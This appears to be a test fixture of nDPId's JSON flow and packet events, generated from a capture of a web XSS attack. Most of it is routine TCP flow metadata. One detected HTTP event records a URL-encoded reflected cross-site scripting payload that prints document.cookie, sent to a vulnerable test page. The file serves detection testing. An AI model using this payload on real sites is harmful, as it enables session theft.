-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347286403,"flow_last_seen":1499347291698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347286403,"flow_last_seen":1499347291698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347287659,"flow_last_seen":1499347292698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347287659,"flow_last_seen":1499347292698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347290163,"flow_last_seen":1499347295228,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347292725,"flow_last_seen":1499347298700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347292725,"flow_last_seen":1499347298700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347414728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347417243,"flow_last_seen":1499347417243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347417243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1499347417243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347417243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82KJAAD4G7S2sEAABwKgKMt6GAFDK0UZQAAAAAKACchDO3gAAAgQFtAQCCAoBOp7yAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3742,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1499347417244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347417244,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3oZtyr1sytFGUaAScSAwOgAAAgQFtAQCCAoD5HBoATqe8gEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":3,"flow_last_seen":1499347417244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347417244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02KNAAD4G7TSsEAABwKgKMt6GAFDK0UZRbcq9bYAQAOXPQAAAAQEICgE6nvMD5HBo"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347418519,"flow_last_seen":1499347418519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347418519,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1499347418519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347418519,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8f6JAAD4GRi6sEAABwKgKMt6UAFCK5d+TAAAAAKACchB0OgAAAgQFtAQCCAoBOqAxAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3754,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":2,"flow_last_seen":1499347418519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347418519,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3pQDHUU3iuXflKAScSC3OQAAAgQFtAQCCAoD5HGnATqgMQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1499347418520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347418520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0f6NAAD4GRjWsEAABwKgKMt6UAFCK5d+UAx1FOIAQAOVWQQAAAQEICgE6oDED5HGn"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347419786,"flow_last_seen":1499347419786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347419786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1499347419786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347419786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QexAAD4Gg+SsEAABwKgKMt6iAFBxNOCCAAAAAKACchCLsQAAAgQFtAQCCAoBOqFuAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":2,"flow_last_seen":1499347419786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347419786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3qLCWbCfcTTgg6AScSCizgAAAgQFtAQCCAoD5HLkATqhbgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1499347419787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347419787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Qe1AAD4Gg+usEAABwKgKMt6iAFBxNOCDwlmwoIAQAOVB1gAAAQEICgE6oW4D5HLk"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3777,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347421069,"flow_last_seen":1499347421069,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347421069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3777,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1499347421069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347421069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88e9AAD4G0+CsEAABwKgKMt6wAFBX5lNAAAAAAKACchAw8wAAAgQFtAQCCAoBOqKvAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3778,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":2,"flow_last_seen":1499347421069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347421069,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3rDPNYnSV+ZTQaAScSBgwQAAAgQFtAQCCAoD5HQkATqirwEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3779,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":3,"flow_last_seen":1499347421069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347421069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08fBAAD4G0+esEAABwKgKMt6wAFBX5lNBzzWJ04AQAOX\/yAAAAQEICgE6oq8D5HQk"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347422332,"flow_last_seen":1499347422332,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347422332,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1499347422332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347422332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Nl1AAD4Gj3OsEAABwKgKMt6+AFBNkZW3AAAAAKACchD3hwAAAgQFtAQCCAoBOqPqAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3787,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":2,"flow_last_seen":1499347422332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347422332,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3r7LRREdTZGVuKAScSCivwAAAgQFtAQCCAoD5HVgATqj6gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3788,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":3,"flow_last_seen":1499347422333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347422333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Nl5AAD4Gj3qsEAABwKgKMt6+AFBNkZW4y0URHoAQAOVBxgAAAQEICgE6o+sD5HVg"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347423604,"flow_last_seen":1499347423604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347423604,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1499347423604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347423604,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TspAAD4GdwasEAABwKgKMt7MAFD5I+viAAAAAKACchD0fQAAAgQFtAQCCAoBOqUoAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":2,"flow_last_seen":1499347423604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347423604,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3szh681K+SPr46AScSDLowAAAgQFtAQCCAoD5HaeATqlKAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":3,"flow_last_seen":1499347423605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347423605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TstAAD4Gdw2sEAABwKgKMt7MAFD5I+vj4evNS4AQAOVqqgAAAQEICgE6pSkD5Hae"} 
-01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347419786,"flow_last_seen":1499347423605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347423605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AA0U7VCIO18AUKPZNB0ZXFCDF9PVHM0BRGOWM22EICNEPXK5UC%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347295224,"flow_last_seen":1499347300701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347295224,"flow_last_seen":1499347300701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347296462,"flow_last_seen":1499347301701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347296462,"flow_last_seen":1499347301701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347297732,"flow_last_seen":1499347303701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347297732,"flow_last_seen":1499347303701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347300263,"flow_last_seen":1499347305701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347300263,"flow_last_seen":1499347305701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347301520,"flow_last_seen":1499347306702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347301520,"flow_last_seen":1499347306702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347304125,"flow_last_seen":1499347309703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347304125,"flow_last_seen":1499347309703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347424876,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 